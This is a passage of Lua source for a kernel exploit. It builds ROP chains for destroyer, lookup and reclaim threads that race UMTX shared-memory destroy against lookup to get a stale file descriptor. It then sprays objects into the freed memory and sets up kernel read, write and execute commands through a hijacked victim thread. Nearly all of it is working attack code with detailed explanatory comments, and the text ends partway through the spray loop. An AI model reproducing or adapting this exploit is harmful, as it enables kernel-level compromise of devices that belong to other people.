--- lookup and reclaim threads, then repeatedly races UMTX_SHM_DESTROY against
--- UMTX_SHM_LOOKUP until a stale "winner" file descriptor is found.
--- Returns true when a winner fd was obtained, false otherwise.
function initial_exploit()
    -- Pin main thread to one core.
    dbgf("pinning main thread to one core")
    if not set_current_thread_cpu_affinity(main_rop, exp.MAIN_THREAD_CORES) then
        errorf("pinning main thread to one core failed")
    end
    if toggle_set_thread_priorities then
        -- Set main thread priority to highest possible priority.
        if not set_current_thread_priority(main_rop, { type = exp.THREAD_PRIORITY_TYPE, prio = exp.MAIN_THREAD_PRIORITY }) then
            errorf("setting main thread priority failed")
        end
    end
    --
    -- Create destroyer and lookup threads.
    --
    -- Captured by destroyer_rop_cb below to assign per-thread result slots;
    -- incremented once per generated destroyer chain.
    local destroyer_thread_index = 0
    -- Generate the ROP program for one destroyer thread. The emitted chain is
    -- an outer loop that, until the race-done flag is set, performs:
    --   1) wait for the ready flag, then bump num_ready_threads;
    --   2) wait for the destroy flag, then issue
    --      umtx_op(UMTX_OP_SHM, UMTX_SHM_DESTROY, shm_key_1), recording
    --      rax/errno into this thread's result slots and bumping num_destroys
    --      on success;
    --   3) bump num_completed_threads, wait for check_done, bump
    --      num_ready_threads again;
    --   4) wait for the done flag, bump num_finished_threads and restore the
    --      backed-up stack before looping.
    -- Tail: once race-done is observed, spin on sched_yield until the destroy
    -- flag is raised again, then return.
    -- Result/errno slot index is 1 + destroyer_thread_index (slot 0 belongs to
    -- the lookup thread); the captured counter is incremented at the end so
    -- each generated chain gets a distinct slot.
    local function destroyer_rop_cb(rop, thread_id_addr)
        local marker_for_outer_loop_start = rop:generate_marker("outer_loop_start")
        local marker_for_outer_loop_end = rop:generate_marker("outer_loop_end")
        local marker_for_inner_loop1_start = rop:generate_marker("inner_loop1_start")
        local marker_for_inner_loop1_end = rop:generate_marker("inner_loop1_end")
        local marker_for_inner_loop2_start = rop:generate_marker("inner_loop2_start")
        local marker_for_inner_loop2_end = rop:generate_marker("inner_loop2_end")
        local marker_for_destroy_end = rop:generate_marker("destroy_end")
        local marker_for_inner_loop3_start = rop:generate_marker("inner_loop3_start")
        local marker_for_inner_loop3_end = rop:generate_marker("inner_loop3_end")
        local marker_for_inner_loop4_start = rop:generate_marker("inner_loop4_start")
        local marker_for_inner_loop4_end = rop:generate_marker("inner_loop4_end")
        local scratch_rax_addr = rop:scratch_rax_addr()
        local scratch_errno_addr = rop:scratch_errno_addr()
        -- Per-thread 8-byte slots; slot 0 is reserved for the lookup thread.
        local return_value_addr = estate.thread_return_value_addr + (1 + destroyer_thread_index) * 0x8
        local errno_addr = estate.thread_errno_addr + (1 + destroyer_thread_index) * 0x8
        --
        -- Outer loop that runs until race done flag is set.
        --
        rop:set_marker(marker_for_outer_loop_start)
        -- Check for race done flag set.
        rop:gen_conditional({ estate.race_done_flag_addr }, "==", 0, marker_for_inner_loop1_start, marker_for_outer_loop_end)
        rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))
        --
        -- Inner loop #1 that waits until all threads and objects are initialized.
        --
        rop:set_marker(marker_for_inner_loop1_start)
        -- Check for ready flag set.
        rop:gen_conditional({ estate.ready_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop1_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop1_start))
        rop:set_marker(marker_for_inner_loop1_end)
        -- Notify main thread that destroyer thread is ready to start.
        rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)
        --
        -- Inner loop #2 that waits for destroy signal.
        --
        rop:set_marker(marker_for_inner_loop2_start)
        -- Check for destroy flag set.
        rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop2_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop2_start))
        rop:set_marker(marker_for_inner_loop2_end)
        -- Trigger destroying of UMTX.
        rop:push_syscall_safe("umtx_op", 0, globals.UMTX_OP_SHM, globals.UMTX_SHM_DESTROY, estate.shm_key_1, 0)
        rop:push_load_rax(scratch_rax_addr)
        rop:push_store_rax(return_value_addr)
        rop:push_load_rax(scratch_errno_addr)
        rop:push_store_rax(errno_addr)
        -- Check for destroy result.
        rop:gen_conditional({ return_value_addr }, "!=", -1, function(rop)
            -- Notify that destroy succeeded.
            rop:push_add_atomic_32(estate.num_destroys_addr, 1)
            rop:push_set_rsp(rop:use_marker(marker_for_destroy_end))
        end, marker_for_destroy_end)
        rop:set_marker(marker_for_destroy_end)
        -- Notify that destroyer thread did its main job.
        rop:push_add_atomic_32(estate.num_completed_threads_addr, 1)
        --
        -- Inner loop #3 that waits for check done.
        --
        rop:set_marker(marker_for_inner_loop3_start)
        -- Check for check done flag set.
        rop:gen_conditional({ estate.check_done_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop3_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop3_start))
        rop:set_marker(marker_for_inner_loop3_end)
        -- Notify main thread that destroyer thread is ready to finish.
        rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)
        --
        -- Inner loop #4 that waits for done flag.
        --
        rop:set_marker(marker_for_inner_loop4_start)
        -- Check for done flag set.
        rop:gen_conditional({ estate.done_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop4_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop4_start))
        rop:set_marker(marker_for_inner_loop4_end)
        -- Notify main thread that destroyer thread was finished.
        rop:push_add_atomic_32(estate.num_finished_threads_addr, 1)
        -- Recover original stack because it may be corrupted.
        rop:push_load_backup()
        -- Go to beginning of outer loop.
        rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))
        --
        -- Tail.
        --
        -- Race done, waiting to end.
        rop:set_marker(marker_for_outer_loop_end)
        -- Let other threads do something.
        rop:push_syscall_noret("sched_yield")
        -- Spin here until the destroy flag is raised, then fall through to return.
        rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, marker_for_outer_loop_end)
        rop:push_ret()
        destroyer_thread_index = destroyer_thread_index + 1
    end
    -- Generate the ROP program for the single lookup thread. Mirrors
    -- destroyer_rop_cb but step 2 issues
    -- umtx_op(UMTX_OP_SHM, UMTX_SHM_LOOKUP, shm_key_1) instead of destroy and,
    -- on success, stores the returned file descriptor into
    -- estate.lookup_fd_addr. Uses result/errno slot 0.
    local function lookup_rop_cb(rop, thread_id_addr)
        local marker_for_outer_loop_start = rop:generate_marker("outer_loop_start")
        local marker_for_outer_loop_end = rop:generate_marker("outer_loop_end")
        local marker_for_inner_loop1_start = rop:generate_marker("inner_loop1_start")
        local marker_for_inner_loop1_end = rop:generate_marker("inner_loop1_end")
        local marker_for_inner_loop2_start = rop:generate_marker("inner_loop2_start")
        local marker_for_inner_loop2_end = rop:generate_marker("inner_loop2_end")
        local marker_for_lookup_end = rop:generate_marker("lookup_end")
        local marker_for_inner_loop3_start = rop:generate_marker("inner_loop3_start")
        local marker_for_inner_loop3_end = rop:generate_marker("inner_loop3_end")
        local marker_for_inner_loop4_start = rop:generate_marker("inner_loop4_start")
        local marker_for_inner_loop4_end = rop:generate_marker("inner_loop4_end")
        local scratch_rax_addr = rop:scratch_rax_addr()
        local scratch_errno_addr = rop:scratch_errno_addr()
        -- Slot 0 of the per-thread result/errno arrays belongs to this thread.
        local return_value_addr = estate.thread_return_value_addr
        local errno_addr = estate.thread_errno_addr
        --
        -- Outer loop that runs until race done flag is set.
        --
        rop:set_marker(marker_for_outer_loop_start)
        -- Check for race done flag set.
        rop:gen_conditional({ estate.race_done_flag_addr }, "==", 0, marker_for_inner_loop1_start, marker_for_outer_loop_end)
        rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))
        --
        -- Inner loop #1 that waits until all threads and objects are initialized.
        --
        rop:set_marker(marker_for_inner_loop1_start)
        -- Check for ready flag set.
        rop:gen_conditional({ estate.ready_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop1_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop1_start))
        rop:set_marker(marker_for_inner_loop1_end)
        -- Notify main thread that lookup thread is ready to start.
        rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)
        --
        -- Inner loop #2 that waits for destroy signal.
        --
        rop:set_marker(marker_for_inner_loop2_start)
        -- Check for destroy flag set.
        rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop2_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop2_start))
        rop:set_marker(marker_for_inner_loop2_end)
        -- Trigger lookup of UMTX.
        rop:push_syscall_safe("umtx_op", 0, globals.UMTX_OP_SHM, globals.UMTX_SHM_LOOKUP, estate.shm_key_1, 0)
        rop:push_load_rax(scratch_rax_addr)
        rop:push_store_rax(return_value_addr)
        rop:push_load_rax(scratch_errno_addr)
        rop:push_store_rax(errno_addr)
        -- Check for lookup result.
        rop:gen_conditional({ return_value_addr }, "!=", -1, function(rop)
            -- Publish the looked-up fd so the main thread can examine it.
            rop:push_load_rax(return_value_addr)
            rop:push_store_rax(estate.lookup_fd_addr)
        end, marker_for_lookup_end)
        rop:set_marker(marker_for_lookup_end)
        -- Notify that lookup thread did its main job.
        rop:push_add_atomic_32(estate.num_completed_threads_addr, 1)
        --
        -- Inner loop #3 that waits for check done.
        --
        rop:set_marker(marker_for_inner_loop3_start)
        -- Check for check done flag set.
        rop:gen_conditional({ estate.check_done_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop3_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop3_start))
        rop:set_marker(marker_for_inner_loop3_end)
        -- Notify main thread that lookup thread is ready to finish.
        rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)
        --
        -- Inner loop #4 that waits for done flag.
        --
        rop:set_marker(marker_for_inner_loop4_start)
        -- Check for done flag set.
        rop:gen_conditional({ estate.done_flag_addr }, "==", 0, function(rop)
            rop:push_syscall_noret("sched_yield")
        end, marker_for_inner_loop4_end)
        rop:push_set_rsp(rop:use_marker(marker_for_inner_loop4_start))
        rop:set_marker(marker_for_inner_loop4_end)
        -- Notify main thread that lookup thread was finished.
        rop:push_add_atomic_32(estate.num_finished_threads_addr, 1)
        -- Recover original stack because it may be corrupted.
        rop:push_load_backup()
        -- Go to beginning of outer loop.
        rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))
        --
        -- Tail.
        --
        -- Race done, waiting to end.
        rop:set_marker(marker_for_outer_loop_end)
        -- Let other threads do something.
        rop:push_syscall_noret("sched_yield")
        -- Spin here until the destroy flag is raised, then fall through to return.
        rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, marker_for_outer_loop_end)
        rop:push_ret()
    end
local function prepare_thread_marker(idx)
assert(type(idx) == "number")
-- 41 41 41 [41 + idx]
local marker = bit32.bor(exp.RECLAIMED_THREAD_MARKER_BASE, bit32.lshift(0x41 + idx, 24))
local marker_addr = estate.reclaim_thread_marker_addr + (idx - 1) * exp.THREAD_MARKER_BUFFER_SIZE
if use_blocking_select then
memory.write64(marker_addr, uint64:new(0, marker))
else
local count = math.floor(exp.THREAD_MARKER_BUFFER_SIZE / 0x4)
for i = 1, count do
memory.write32(marker_addr + (i - 1) * 0x4, marker)
end
end
end
    -- Captured by reclaim_rop_cb below; incremented once per generated chain
    -- so each reclaim thread gets distinct result/marker/stack-return slots.
    local reclaim_thread_index = 0
    -- Generate the ROP program for one reclaim thread. The emitted chain:
    --   * waits until the ready flag is set;
    --   * loops spraying its marker into kernel memory (blocking |select| with
    --     the marker as an fd_set, or repeated |ioctl| with the marker buffer)
    --     until the main thread publishes this thread's id as the victim, or
    --     bails out to the release tail when the destroy flag is set;
    --   * parks on a blocking read from an empty pipe while the main thread
    --     remaps the freed region (recreation phase);
    --   * then enters a command loop dispatching CMD_KREAD (blocking pipe
    --     write), CMD_KWRITE (blocking pipe read) and CMD_KEXEC (stack pivot
    --     into estate.exec_rop), clearing the command/wait flags after each.
    local function reclaim_rop_cb(rop, thread_id_addr)
        local marker_for_init_wait_loop_start = rop:generate_marker("init_wait_loop_start")
        local marker_for_wait_loop_start = rop:generate_marker("wait_loop_start")
        local marker_for_recreation_loop = rop:generate_marker("recreation_loop")
        local marker_for_kread_cmd_check = rop:generate_marker("kread_cmd_check")
        local marker_for_kwrite_cmd_check = rop:generate_marker("kwrite_cmd_check")
        local marker_for_kexec_cmd_check = rop:generate_marker("kexec_cmd_check")
        local marker_for_cmd_handler_end = rop:generate_marker("cmd_handler_end")
        local marker_for_release = rop:generate_marker("release")
        local scratch_rax_addr = rop:scratch_rax_addr()
        local scratch_errno_addr = rop:scratch_errno_addr()
        -- Result slots follow the lookup (slot 0) and destroyer slots.
        local return_value_addr = estate.thread_return_value_addr + (1 + exp.MAX_DESTROYER_THREADS + reclaim_thread_index) * 0x8
        local errno_addr = estate.thread_errno_addr + (1 + exp.MAX_DESTROYER_THREADS + reclaim_thread_index) * 0x8
        local stack_return_addr = estate.reclaim_thread_stack_return_addr + reclaim_thread_index * 0x8
        local marker_addr = estate.reclaim_thread_marker_addr + reclaim_thread_index * exp.THREAD_MARKER_BUFFER_SIZE
        local marker_copy_addr = marker_addr + 0x8
        -- Prepare thread marker which will be used to determine victim thread ID.
        prepare_thread_marker(reclaim_thread_index + 1)
        --
        -- Initial wait loop that runs until all reclaim threads are created.
        --
        rop:set_marker(marker_for_init_wait_loop_start)
        rop:push_syscall_noret("sched_yield")
        -- Check for ready flag set.
        rop:gen_conditional({ estate.ready_flag_addr }, "!=", 0, marker_for_wait_loop_start)
        -- Go to beginning of initial wait loop.
        rop:push_set_rsp(rop:use_marker(marker_for_init_wait_loop_start))
        --
        -- Wait loop that runs until kernel stack is obtained.
        --
        rop:set_marker(marker_for_wait_loop_start)
        if use_blocking_select then
            -- Copy marker because |select| may overwrite it.
            rop:push_load_rax(marker_addr)
            rop:push_store_rax(marker_copy_addr)
        end
        rop:push_syscall_noret("sched_yield")
        -- Check which thread marker was found.
        rop:gen_conditional({ estate.victim_thread_id_addr }, "!=", { thread_id_addr }, function(rop)
            -- Check if we need to finish.
            rop:gen_conditional({ estate.destroy_flag_addr }, "==", 1, marker_for_release)
            if use_blocking_select then
                rop:push_syscall_noret("select", 1, marker_copy_addr, 0, 0, estate.timeout_addr)
            else
                for i = 1, exp.MAX_RECLAIM_SYSTEM_CALLS do
                    rop:push_syscall_noret("ioctl", 0xbeef, globals.IOW(0, 0, exp.THREAD_MARKER_BUFFER_SIZE), marker_addr)
                end
            end
        end, marker_for_recreation_loop)
        -- Recover original stack because it may be corrupted.
        rop:push_load_backup()
        -- Go to beginning of wait loop.
        rop:push_set_rsp(rop:use_marker(marker_for_wait_loop_start))
        --
        -- Wait loop for recreation phase.
        --
        rop:set_marker(marker_for_recreation_loop)
        -- Let's wait some time whilst we unmap shared memory region and
        -- recreate it with original stack contents. Make it using blocking call
        -- of reading from empty pipe.
        rop:push_syscall_safe("read", estate.rpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
        rop:push_load_rax(scratch_rax_addr)
        rop:push_store_rax(return_value_addr)
        rop:push_load_rax(scratch_errno_addr)
        rop:push_store_rax(errno_addr)
        --
        -- Command processor loop.
        --
        rop:set_marker(marker_for_kread_cmd_check)
        rop:push_syscall_noret("sched_yield")
        -- Check for read command.
        rop:gen_conditional({ estate.cmd_addr }, "==", exp.CMD_KREAD, function(rop)
            -- Do blocking write pipe call.
            rop:push_syscall_safe("write", estate.wpipe_fd, estate.pipe_buf_addr, { estate.rw_size_addr })
            rop:push_load_rax(scratch_rax_addr)
            rop:push_store_rax(return_value_addr)
            rop:push_load_rax(scratch_errno_addr)
            rop:push_store_rax(errno_addr)
            -- Reset wait flag.
            rop:push_store_zero_32(estate.cmd_wait_flag_addr)
            -- Reset command.
            rop:push_store_zero_32(estate.cmd_addr)
        end, marker_for_kwrite_cmd_check)
        -- Go to ending of command processor loop.
        rop:push_set_rsp(rop:use_marker(marker_for_cmd_handler_end))
        rop:set_marker(marker_for_kwrite_cmd_check)
        rop:push_syscall_noret("sched_yield")
        -- Check for write command.
        rop:gen_conditional({ estate.cmd_addr }, "==", exp.CMD_KWRITE, function(rop)
            -- Do blocking read pipe call.
            rop:push_syscall_safe("read", estate.rpipe_fd, estate.pipe_buf_addr, { estate.rw_size_addr })
            rop:push_load_rax(scratch_rax_addr)
            rop:push_store_rax(return_value_addr)
            rop:push_load_rax(scratch_errno_addr)
            rop:push_store_rax(errno_addr)
            -- Reset wait flag.
            rop:push_store_zero_32(estate.cmd_wait_flag_addr)
            -- Reset command.
            rop:push_store_zero_32(estate.cmd_addr)
        end, marker_for_kexec_cmd_check)
        -- Go to ending of command processor loop.
        rop:push_set_rsp(rop:use_marker(marker_for_cmd_handler_end))
        rop:set_marker(marker_for_kexec_cmd_check)
        rop:push_syscall_noret("sched_yield")
        -- Check for execute command.
        rop:gen_conditional({ estate.cmd_addr }, "==", exp.CMD_KEXEC, function(rop)
            assert(type(estate.exec_rop) == "table")
            -- Execute another ROP chain and return back.
            rop:push_set_rsp(estate.exec_rop:data_addr())
            -- NOTE: this write runs now, at chain-generation time (not when the
            -- chain executes); it records the chain address right after the
            -- pivot so the executed chain can jump back here.
            -- Store current stack address to be able to return back.
            memory.write64(stack_return_addr, rop:current_addr())
            -- Let main thread catch it.
            rop:push_syscall_noret("sched_yield")
            -- Reset wait flag.
            rop:push_store_zero_32(estate.cmd_wait_flag_addr)
            -- Reset command.
            rop:push_store_zero_32(estate.cmd_addr)
        end, marker_for_cmd_handler_end)
        rop:set_marker(marker_for_cmd_handler_end)
        -- Let other threads do something.
        rop:push_syscall_noret("sched_yield")
        -- Recover original stack because it may be corrupted.
        rop:push_load_backup()
        -- Go to beginning of command processor loop.
        rop:push_set_rsp(rop:use_marker(marker_for_kread_cmd_check))
        --
        -- Tail.
        --
        -- Not victim thread, release it.
        rop:set_marker(marker_for_release)
        rop:push_ret()
        reclaim_thread_index = reclaim_thread_index + 1
    end
    -- Create the destroyer ("racing #2") threads. Each thread gets its own
    -- slice of the combined ROP storage (slice index i; slice 0 is reserved
    -- for the lookup thread), is pinned to its own core, and optionally has
    -- its priority raised so it runs before the lookup thread.
    runner(function()
        for i = 1, exp.MAX_DESTROYER_THREADS do
            dbgf("creating racing thread #2/#%u", i)
            -- Slice i of the combined storage (slice 0 belongs to lookup).
            local offset = i * estate.combined_rop_storage_size
            local read_addr = estate.combined_rop_storage_read_addr + offset
            local write_addr = estate.combined_rop_storage_write_addr + offset
            dbgf("readable memory at %s of size 0x%x", read_addr, estate.combined_rop_storage_size)
            dbgf("writeable memory at %s of size 0x%x", write_addr, estate.combined_rop_storage_size)
            local storage = make_ropchain_storage_default(sprintf("dthr_%03d", i), exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, read_addr, write_addr, estate.combined_rop_storage_size, estate.rop_storage_cleanup_cb)
            --dbgf("storage: %s %s", addr_of(storage), inspect(storage))
            -- Create new thread, set up its ROP chain and set name.
            local thr = thread:new(main_rop, destroyer_rop_cb, true, false, storage, sprintf("dthr_%03d", i))
            if toggle_state_debugging then
                logf("racing thread #2/#%u rop stack @ %s", i, thr:thread_rop():data_addr())
                logf(thr:dump_rop_stack(filter_addr_keys(estate)))
            end
            if not thr:start() then
                errorf("starting racing thread #2/#%u failed", i)
            end
            -- Wait some time, otherwise we may not be able to get thread id.
            thr:wait_to_become_live()
            -- Move destroyer thread to separate core.
            if not set_thread_cpu_affinity(main_rop, thr:thread_id(), exp.DESTROYER_THREAD_CORES[i]) then
                errorf("setting racing thread #2/#%u cpu affinity mask failed", i)
            end
            if toggle_set_thread_priorities then
                -- Set destroyer thread priority in such a way that it runs before the lookup thread.
                if not set_thread_priority(main_rop, thr:thread_id(), { type = exp.THREAD_PRIORITY_TYPE, prio = exp.DESTROYER_THREAD_PRIORITY[i] }) then
                    errorf("setting racing thread #2/#%u priority failed", i)
                end
            end
            table.insert(estate.destroyer_thrs, thr)
        end
    end)
    -- Create the single lookup ("racing #1") thread using slice 0 of the
    -- combined ROP storage, pin it to its own core and optionally lower its
    -- priority so it runs after the destroyer threads.
    runner(function()
        dbgf("creating racing thread #1")
        local read_addr = uint64:new(estate.combined_rop_storage_read_addr)
        local write_addr = uint64:new(estate.combined_rop_storage_write_addr)
        dbgf("readable memory at %s of size 0x%x", read_addr, estate.combined_rop_storage_size)
        dbgf("writeable memory at %s of size 0x%x", write_addr, estate.combined_rop_storage_size)
        local storage = make_ropchain_storage_default("lthr", exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, read_addr, write_addr, estate.combined_rop_storage_size, estate.rop_storage_cleanup_cb)
        --dbgf("storage: %s %s", addr_of(storage), inspect(storage))
        -- Create new thread, set up its ROP chain and set name.
        local thr = thread:new(main_rop, lookup_rop_cb, true, false, storage, "lthr")
        if not thr:start() then
            errorf("starting racing thread #1 failed")
        end
        -- NOTE(review): unlike the destroyer path, the rop stack is dumped
        -- after start() here — confirm whether this ordering is intentional.
        if toggle_state_debugging then
            logf("racing thread #1 rop stack @ %s", thr:thread_rop():data_addr())
            logf(thr:dump_rop_stack(filter_addr_keys(estate)))
        end
        -- Wait some time, otherwise we may not be able to get thread id.
        thr:wait_to_become_live()
        -- Move lookup thread to separate core.
        if not set_thread_cpu_affinity(main_rop, thr:thread_id(), exp.LOOKUP_THREAD_CORES) then
            errorf("setting racing thread #1 cpu affinity mask failed")
        end
        if toggle_set_thread_priorities then
            -- Set lookup thread priority in such a way that it runs after the destroyer threads.
            if not set_thread_priority(main_rop, thr:thread_id(), { type = exp.THREAD_PRIORITY_TYPE, prio = exp.LOOKUP_THREAD_PRIORITY }) then
                errorf("setting racing thread #1 priority failed")
            end
        end
        estate.lookup_thr = thr
    end)
runner(function()
dbgf("creating reclaim threads")
for i = 1, exp.MAX_RECLAIM_OBJECTS do
dbgf("creating reclaim thread #%u", i)
local offset = (exp.MAX_DESTROYER_THREADS + i) * estate.combined_rop_storage_size
local read_addr = estate.combined_rop_storage_read_addr + offset
local write_addr = estate.combined_rop_storage_write_addr + offset
dbgf("readable memory at %s of size 0x%x", read_addr, estate.combined_rop_storage_size)
dbgf("writeable memory at %s of size 0x%x", write_addr, estate.combined_rop_storage_size)
local storage = make_ropchain_storage_default(sprintf("rclm_%03d", i), exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, read_addr, write_addr, estate.combined_rop_storage_size, estate.rop_storage_cleanup_cb)
--dbgf("storage: %s %s", addr_of(storage), inspect(storage))
-- Create new thread, set up its ROP chain and set name.
local thr = thread:new(main_rop, reclaim_rop_cb, true, false, storage, exp.VICTIM_THREAD_NAME)
if toggle_state_debugging then
logf("reclaim thread %#u stack @ %s", i, thr:thread_rop():data_addr())
logf(thr:dump_rop_stack(filter_addr_keys(estate)))
end
table.insert(estate.reclaim_thrs, thr)
-- It is important otherwise it may crash due to memory outage.
collectgarbage()
end
dbgf("reclaim threads created")
end)
--
-- Initial exploitation that triggers memory corruption.
--
local function reset_state(rop)
memory.write32(estate.race_done_flag_addr, 0)
memory.write32(estate.ready_flag_addr, 0)
memory.write32(estate.destroy_flag_addr, 0)
memory.write32(estate.check_done_flag_addr, 0)
memory.write32(estate.done_flag_addr, 0)
memory.write32(estate.num_ready_threads_addr, 0)
memory.write32(estate.num_completed_threads_addr, 0)
memory.write32(estate.num_destroys_addr, 0)
memory.write32(estate.num_finished_threads_addr, 0)
memory.write32(estate.original_fd_addr, -1)
memory.write32(estate.lookup_fd_addr, -1)
memory.write32(estate.winner_fd_addr, -1)
for i = 1, exp.MAX_DESTROYER_THREADS do
memory.write32(estate.fds_for_reclaim_addr + (i - 1) * 0x8, -1)
end
local count = 1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS
for i = 1, count do
memory.write64(estate.thread_return_value_addr + (i - 1) * 0x8, 0)
memory.write32(estate.thread_errno_addr + (i - 1) * 0x8, 0)
end
end
local function truncate_shm_file(rop, fd)
assert(type(fd) == "number")
-- To be able to know file descriptor for specific SHM we set its size as multiple of |exp.MAGIC_NUMBER|.
local size = fd * exp.MAGIC_NUMBER
return truncate_file(rop, fd, size)
end
local function populate_exploited_fds(fd)
local idx = table.index_of(estate.exploited_fds, fd)
if idx == nil then
table.insert(estate.exploited_fds, fd)
return true
else
return false
end
end
local function check_for_corruption(rop)
local original_fd = as_sint32(memory.read32(estate.original_fd_addr))
if original_fd < 0 then
warnf("check_for_corruption: no original fd")
return nil
end
local lookup_fd = as_sint32(memory.read32(estate.lookup_fd_addr))
if lookup_fd < 0 then
dbgf("check_for_corruption: no victim fd")
return nil
end
populate_exploited_fds(lookup_fd)
dbgf("check_for_corruption: original fd: %d, victim fd: %d", original_fd, lookup_fd)
local size = get_file_size(rop, lookup_fd)
if size == nil then
warnf("check_for_corruption: getting file size for victim fd %d failed", lookup_fd)
return nil
end
dbgf("check_for_corruption: size: %s", size)
local fd = as_sint32((size / exp.MAGIC_NUMBER).lo)
dbgf("check_for_corruption: calculated fd: %d", fd)
if fd ~= original_fd and fd ~= lookup_fd then
dbgf("check_for_corruption: found different fd: %d", fd)
return fd
else
return nil
end
end
local function cleanup_state(rop)
for i = 1, exp.MAX_DESTROYER_THREADS do
local fd_addr = estate.fds_for_reclaim_addr + (i - 1) * 0x8
local fd = as_sint32(memory.read32(fd_addr))
if fd >= 0 then
dbgf("cleanup_state: closing fd for reclaim %d", fd)
if not close_file(rop, fd) then
warnf("cleanup_state: closing fd for reclaim %d failed", fd)
end
memory.write32(fd_addr, -1)
end
end
local fd = as_sint32(memory.read32(estate.lookup_fd_addr))
if fd >= 0 then
dbgf("cleanup_state: closing victim fd %d", fd)
if not close_file(rop, fd) then
warnf("cleanup_state: closing victim fd %d failed", fd)
end
memory.write32(estate.lookup_fd_addr, -1)
end
dbgf("cleanup_state: destroying umtx shm #2")
if umtx_shm_destroy(rop, estate.shm_key_2) then
dbgf("cleanup_state: destroying umtx shm #2 succeeded unexpectedly")
end
dbgf("cleanup_state: destroying umtx shm #1")
if umtx_shm_destroy(rop, estate.shm_key_1) then
dbgf("cleanup_state: destroying umtx shm #1 succeeded unexpectedly")
end
end
local function wait_for(addr, threshold, text)
local count
while true do
count = memory.read32(addr)
if count >= threshold then
break
end
dbgf("main_thread: waiting for" .. text .. " (%u/%u)", count, threshold)
yield(main_rop)
end
dbgf("main_thread: done waiting for" .. text .. " (%u/%u)", count, threshold)
end
    local num_iterations = 0
    -- NOTE(review): |result| and |errno| appear unused in the loop below —
    -- candidates for removal.
    local result, errno
    local winner_fd, fd
    dbgf("main_thread: resetting state")
    reset_state(main_rop)
    -- Main race loop: each iteration creates the SHM, lets the destroyer and
    -- lookup threads race destroy vs lookup, sprays replacement SHM objects,
    -- and checks whether a stale ("winner") descriptor was produced.
    while memory.read32(estate.race_done_flag_addr) == 0 do
        dbgf("main_thread: starting")
        -- Create UMTX and corresponding SHM object.
        dbgf("main_thread: creating umtx shm #1")
        fd = umtx_shm_create(main_rop, estate.shm_key_1)
        if fd == nil then
            errorf("main_thread: creating umtx shm #1 failed")
        end
        dbgf("main_thread: original fd: %d", fd)
        -- Keep original file descriptor number for further checks.
        memory.write32(estate.original_fd_addr, fd)
        if estate.first_original_fd < 0 then
            estate.first_original_fd = fd
        end
        -- Set SHM size in such a way that we can recover its file descriptor from the size.
        dbgf("main_thread: truncating original fd %d", fd)
        if not truncate_shm_file(main_rop, fd) then
            errorf("main_thread: truncating original fd %d failed", fd)
        end
        -- Close created file descriptor to decrement SHM reference counter.
        dbgf("main_thread: closing original fd %d", fd)
        if not close_file(main_rop, fd) then
            errorf("main_thread: closing original fd %d failed", fd)
        end
        dbgf("main_thread: we are ready to start")
        -- Notify other threads that we are ready to start.
        memory.write32(estate.ready_flag_addr, 1)
        -- Wait for other threads to be active.
        wait_for(estate.num_ready_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be ready") -- plus one for lookup thread
        -- Clear ready flag, thus no other thread will start its loop again prematurely.
        memory.write32(estate.ready_flag_addr, 0)
        -- Reset destroyer thread counter to reuse it during clean up.
        memory.write32(estate.num_ready_threads_addr, 0)
        -- Notify destroyer threads that they should try to destroy SHM.
        memory.write32(estate.destroy_flag_addr, 1)
        -- Wait until other threads have done their main job.
        wait_for(estate.num_completed_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be completed") -- plus one for lookup thread
        local n = memory.read32(estate.num_destroys_addr)
        dbgf("main_thread: number of succeeded destroys %u", n)
        dbgf("main_thread: let's do spraying and praying")
        -- Spray UMTX/SHM objects, hopping onto each destroyer core so the new
        -- allocations land in the freed memory.
        for i = 1, exp.MAX_DESTROYER_THREADS do
            dbgf("main_thread: switching to racing thread #2/#%u core", i)
            if not set_current_thread_cpu_affinity(main_rop, exp.DESTROYER_THREAD_CORES[i]) then
                errorf("main_thread: switching to racing thread #2/#%u core failed", i)
            end
            -- Create second UMTX and corresponding SHM object.
            dbgf("main_thread: creating umtx shm #2")
            fd = umtx_shm_create(main_rop, estate.shm_key_2)
            if fd == nil then
                errorf("main_thread: creating umtx shm #2 failed")
            end
            dbgf("main_thread: new fd: %d", fd)
            -- Keep new file descriptor number for further checks.
            memory.write32(estate.fds_for_reclaim_addr + (i - 1) * 0x8, fd)
            -- Set its SHM size.
            dbgf("main_thread: truncating new fd %d", fd)
            if not truncate_shm_file(main_rop, fd) then
                errorf("main_thread: truncating new fd %d failed", fd)
            end
